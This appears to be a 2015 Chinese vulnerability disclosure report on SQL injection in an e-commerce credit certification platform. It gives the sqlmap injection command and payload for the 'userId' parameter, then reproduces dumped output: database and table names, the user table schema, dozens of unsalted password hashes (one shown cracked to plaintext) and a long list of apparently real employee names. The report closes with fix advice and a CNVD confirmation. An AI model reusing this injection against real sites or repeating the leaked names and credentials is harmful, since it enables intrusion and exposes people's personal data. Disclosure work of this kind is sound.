漏洞处理时间线：
2015-10-06：细节已通知厂商并且等待厂商处理中
2015-10-12：厂商已经确认，细节仅向厂商公开
2015-10-22：细节向核心白帽子及相关领域专家公开
2015-11-01：细节向普通白帽子公开
2015-11-11：细节向实习白帽子公开
2015-11-26：细节向公众公开
中国电子商务信用认证平台SQL注射/大量信息泄露
注入点：`sqlmap.py -u "https://**.**.**.**//entry.php?action=getUserinfo2&userId=1%20AND%203*2*1%3d6%20AND%20204%3d204" --dbs`
说明：`entry.php` 的 `userId` 参数未做参数化直接拼入 SQL，URL 中的 `1 AND 3*2*1=6 AND 204=204` 即为布尔型注入探测 payload（URL 中的双斜杠 `//entry.php` 系原文如此）。
影响 19 个库（`--dbs` 枚举结果如下，其后为 szfw2 库的表结构与部分数据）：
available databases [19]:[*] accesslog[*] company[*] cxt[*] cxt_cert[*] dede53[*] information_schema[*] joyinweb[*] mysql[*] performance_schema[*] phpcms[*] phpmyvisites[*] piwik[*] rdfocus[*] szfw2[*] szfw2_call[*] test[*] textpattern[*] tikiwiki[*] typechoDatabase: szfw2[140 tables]+---------------------------------------+| agent_map || am_agent || am_agent_contact || am_agent_in_out_sea_his || am_agent_log || am_agent_move || am_agent_pact || am_agent_permit || am_agent_share || am_agent_share_checklog || am_agent_source || am_agentcheck_log || am_agentpact_checklog || am_expect_charge || am_expect_charge_history || am_last_contact || am_pact_cashdeposit || am_pact_translog || am_quarterly_task || am_visit_acc_check || am_visit_acc_return || am_visit_accompany || am_visit_appoint || am_visit_note || am_visit_return || am_visit_vertify || am_visit_vertify_item || cert_company || cert_domain || cert_license || cm_ag_contact || cm_ag_contact_recode || cm_customer || cm_customer_agent || cm_customer_ex || cm_customer_log || cm_customer_move || cm_customer_permit || cm_data_config || cm_intention || cm_user_move || com_audit_record || com_bill_no || drp_wm_customer || fm_account_detail_rp || fm_account_recharge || fm_agent_account || fm_agent_account_amount || fm_agent_account_detail || fm_agent_bank || fm_attachments || fm_bank_account || fm_invoice_bill || fm_invoice_isseu || fm_invoice_isseu_bill || fm_invoice_no || fm_invoice_type || fm_post_money || fm_receipt_payment_mode || fm_receivable_pay || fm_receivable_pay_state || fm_unit_out_money || hr_abpost || hr_department || hr_dept_position || hr_e_position || hr_employee || hr_employee_old || hr_level || hr_position || hr_postion_level || log_login || log_operate || log_webservice || om_order || om_order_gift || om_order_gift_set || om_order_move_log || om_order_no || om_order_recharge || om_order_website || rpt_agent_contact_record || rpt_agent_intention_rating || rpt_kpi_base || sys_account_group || 
sys_account_group_user || sys_agent_model || sys_agent_model_detail || sys_agroup_manager || sys_agroup_manager_detail || sys_area || sys_area_group || sys_area_group_detail || sys_base_data || sys_city || sys_com_setting || sys_const_data || sys_data_synchronous || sys_dev_auto_code || sys_industry || sys_intention_rating || sys_message || sys_model || sys_model_group || sys_model_right || sys_post_right || sys_product || sys_product_price_model || sys_product_type || sys_province || sys_role || sys_role_right || sys_send_mail || sys_soap_log || sys_unit || sys_unit_salereward_rate_model || sys_unit_salereward_rate_model_detail || sys_upload_doc || sys_user || sys_user_area || sys_user_old || sys_user_right || sys_user_role || sys_vacation_days || sys_zone || temp_111 || temp_cert_company || tm_eMail || tm_net || tm_net_account || tm_net_model_manage_user || tm_net_model_manage_user_history || tm_net_verify || tm_single_info || tm_trustworthy || v_am_agent_pact_product || v_am_effect_pact_product || v_channel_manager_area || v_hr_abpost || v_hr_employee |+---------------------------------------+Database: szfw2Table: sys_user[23 columns]+-----------------+---------------------+| Column | Type |+-----------------+---------------------+| agent_id | int(5) unsigned || create_time | timestamp || create_uid | int(11) unsigned || dept_name | varchar(16) || e_name | varchar(8) || e_uid | int(8) unsigned || finance_no | varchar(64) || finance_uid | int(11) unsigned || is_del | tinyint(3) unsigned || is_finance | tinyint(4) || is_lock | int(3) unsigned || last_login_time | datetime || login_count | int(11) unsigned || phone | varchar(20) || sort_index | int(11) || tel | varchar(20) || update_time | timestamp || update_uid | int(11) unsigned || user_id | int(11) unsigned || user_name | varchar(16) || user_no | varchar(48) || user_pwd | varchar(64) || user_remark | varchar(256) |+-----------------+---------------------+Database: szfw2Table: sys_user[58 
entries]+----------------------------------+| user_pwd |+----------------------------------+| 0009A9BD7AC397B4A311EAD4280E5C74 |明文:zhouhua| 001772FBA101EB45699B34F03F57694C || 0022671AC060C0E6682B2F91B8332BB9 || 00284A6D3ED73DC8D226D53467C1248E || 00291AEFD7117592F0858EC119136E60 || 00370D5A171DEB215D9C8B1FB51BC130 || 004B9B7AC4FC8B9E0412CCA0C9305C46 || 004D0A8147789FBDED427352260365C3 || 004D8391474EE20E05976A7BFFF1BAFE || 004DD1C9C616039C351C94AA7603B8CA || 0058AEA7FC8247B394E1C19FCAF05A36 || 005B6C065A2D4E4E15F5E8D195553336 || 0060CF811B2F26E664DF11352836D521 || 0062D21C1A97ACAD0FFF653DF56849B2 || 0067E0C6A7736FF2FEB5401C50E40055 || 0073F7639030624D23BAA08FA246A49C || 0078F94B32371DF125EF18CB4686E01D || 008B3B2FCDDBA8455DAD8B3A1B3079B4 || 008DBC66A01002D68888DE7B69438955 || 009AA9774B5CF730A880956FE6CAAB23 || 009B927906B97D1507451F45D795D55E || 009B927906B97D1507451F45D795D55E || 00A0C18D686BF8C2A0378DA16CCF7B97 || 00AA1DFAEB695A7AFA25F4E91EF5F3E7 || 00ACA552FD08D98306DB09566C88CF85 || 00B66944EEB6E8342A7085AB0B98AB96 || 00B89B8EB20AB3009960B8C05F2363AE || 00BCB1F530E3FE3F0C46DB712C09312D || 00C222E0437A1EFF39FF1B0C27D51953 || 00C5745BDF12D4C9C8714D53D5EB4053 || 00CF27E392AC1DA17A2A44B2B89AD8B3 || 00D38EF89D410F5FEBFB23DDE1D4E6F3 || 00DCBE5FADCC2A232E2F68DEDC42ABFB || 00DD223C028CEE28C5EF7F82004F4C0F || 00E155244F2829C4D08FE62CDC039B50 || 00E3170230703BE5AC1CEBC30291723A || 00E69BA9AC98F67595DA7AA6C02244D6 || 00EDE0A6C4D967AB8EE0E46C8809CC0E || 00F398C18CEA1911F58696E43CF85A47 || 00F39DCDE9CF1E731344520AB9D2DBA7 || 00F65D2EA75BEC0A987CFF849342BF82 || 00FEF253C6E3BDE1D3F16C6882760392 || 00FF50D1FEDEE1BCDDAFCD96ABC28489 || 010394E55922E7D5CF3B2A5585B06AFB || 0108CF8B0D9F6FBE9F63BD44766EA313 || 010A11C2A6691F8BE77F6519295D20DB || 011FE5DB205CD7CF21144AE329A949D3 || 01224DAF6A9E29FCEFF81668F4AC589E || 0123CADA84714B1273415029FC778C3B || 012A0DF605EDC90B7BFB75FFB55F6103 || 0138C595E85D5BA9951D9993517FEAB3 || 013C9F7DE65AD0C26922D864742F3A7C || 
01438E10ABB1EA0E7B5514A2E61C2191 || 0143B99B04C05979106439B4D4397E8D || 01465D7F7019EC7D654997001678AD2A || 0146F74685E3EF63992126EB50A44A7D || 014D389D1CC652B37FEFA3CADD6D19EF || 0156C4B099E489BA4D13DB6BD3EBB2AE |+----------------------------------+Database: szfw2Table: sys_user[267 entries]+----------+| e_name |+----------+[13:36:59] [WARNING] console output will be trie table size| pshz0060 || test || test || test || test1 || test4 || 丁丽珍 || 丁于 || 丁亚丹 || 丁佳伟 || 丁兵群 || 丁剑波 || 丁勇 || 丁勰 || 丁占英 || 丁卫星 || 丁垚量 || 丁士杰 || 丁季多 || 丁宁 || 丁宏儒 || 丁小兵 || 丁小波 || 丁少远 || 丁幸 || 丁建强 || 丁建潮 || 丁彩 || 丁怡 || 丁慧丽 || 丁敏兰 || 丁新蕾 || 丁旭兰 || 丁晓慧 || 丁晓飞 || 丁柳 || 丁柳 || 丁根良 || 丁梦岚 || 丁泽龙 || 丁海燕 || 丁涛 || 丁涛涛 || 丁潇潇 || 丁玉兰 || 丁玉珍 || 丁珊珊 || 丁碧霞 || 丁磊 || 丁莉萍 || 丁莹 || 丁菊 || 丁蓉蓉 || 丁蕊 || 丁超 || 丁超颖 || 丁达坤 || 丁鑫 || 丁钱杰 || 丁银萍 || 丁银银 || 丁锟 || 丁雨平 || 丁颖 || 丁颖 || 丁飞云 || 丁魁 || 丁鼎 || 万东辉 || 万东辉 || 万云 || 万亚琴 || 万佳玲 || 万光胜 || 万分标 || 万勇 || 万嘉东 || 万娟 || 万婷婷 || 万平 || 万志强 || 万忠坤 || 万振国 || 万敏 || 万文婷 || 万明佳 || 万明辉 || 万昱 || 万晓寅 || 万源 || 万玉婷 || 万琴 || 万真 || 万秀东 || 万科 || 万英宏 || 万蓉 || 万辉 || 万通 || 三部管理 || 上官建行 || 上官艳艳 || 丛珊 || 东智勇 || 严一飞 || 严东红 || 严丽萍 || 严云良 || 严伟 || 严伟惠 || 严佳梦 || 严加武 || 严勇 || 严厚辉 || 严叶超 || 严国梅 || 严国梅 || 严坷娣 || 严娟娟 || 严婕 || 严嵩 || 严廷豪 || 严德胜 || 严志强 || 严振 || 严攀越 || 严文龙 || 严新 || 严晓斌 || 严杭鑫 || 严林树 || 严林盛 || 严梦姣 || 严江成 || 严浩 || 严浩浩 || 严渭飞 || 严玉和 || 严琰 || 严瑶琴 || 严皓 || 严科立 || 严绍平 || 严聪 || 严艳儿 || 严莉萍 || 严跃明 || 严鄂平 || 严陈静 || 中网互赢 || 丰亚雅 || 丰娟 || 丰瑜晴 || 丰财 || 义乌打印 || 乐丽霞 || 乐容容 || 乐朝阳 || 乐淘 || 乐玲娜 || 乐秋露 || 乐超超 || 乔南 || 乔姗姗 || 乔明明 || 乔朋 || 乔蒙蒙 || 乔通卫 || 于军海 || 于军海 || 于利平 || 于博 || 于婷 || 于建军 || 于彩虹 || 于彬彬 || 于振伟 || 于敏茜 || 于明坤 || 于春福 || 于春福 || 于春艳 || 于梦佳 || 于欢欢 || 于泉 || 于洋 || 于琦 || 于琼伟 || 于疆 || 于继纲 || 于若木 || 于萍 || 于金霞 || 于雪 || 于静 || 云占锋 || 云建新 || 亓鑫 || 井厚飞 || 井睆珊 || 井茹 || 亢永灿 || 仇义娜 || 仇志华 || 付世龙 || 付云云 || 付佳倩 || 付倩 || 付勇 || 付勇1 || 付博 || 付姗姗 || 付媛媛 || 付小红 || 付庆洋 || 付徐涛 || 付志文 || 付恩颂 || 付文强 || 付文文 || 付斌斌 || 付晓丽 || 付晓廉 || 付梅 || 付清科 || 付爱春 || 付玲慧 || 付珊珊 || 付祎 || 付胤 || 付芳 || 付闪宾 || 仝丹丹 || 仝琳 || 代凤海 || 代剑锋 || 代婷婷 || 代子慧 
|| 代富如 || 代晓军 || 代晴晴 || 代森 || 代淑姣 || 代玉 || 代瑶 || 代立龙 || 代艳丽 || 代路伟 || 代路英 || 代金苹 || 代金苹 || 代长均 || 代长均 || 仰敏 || 仲夏斌 || 仵州 |+----------+
很多表我都没跑完，因为 sqlmap 的控制台输出太大被截断了（见上文 WARNING），这里只贴几张过程图。
sys_user 表中还有 phone、tel 两列，可直接读出若干电话号码。
一坨密码……看着都头晕。注意 user_pwd 列存储的是 32 位十六进制摘要（长度与无盐 MD5 一致），且上文已有一条被还原为明文 `zhouhua`，说明口令未加盐、可离线破解。
综上：一个未做参数化的 userId 参数即可读取全部 19 个数据库，包括 sys_user 表中的用户名、口令摘要和电话号码。修复建议：对 userId 做整型校验并改用预编译/参数化查询，口令改为加盐慢哈希存储，并在 WAF/日志（log_login、log_operate）层面监控此类注入尝试。
你们懂。
危害等级:中
漏洞Rank:10
确认时间:2015-10-12 10:54
CNVD确认并复现所述情况,已由CNVD通过网站公开联系渠道向其邮件通报,由其后续提供解决方案。
暂无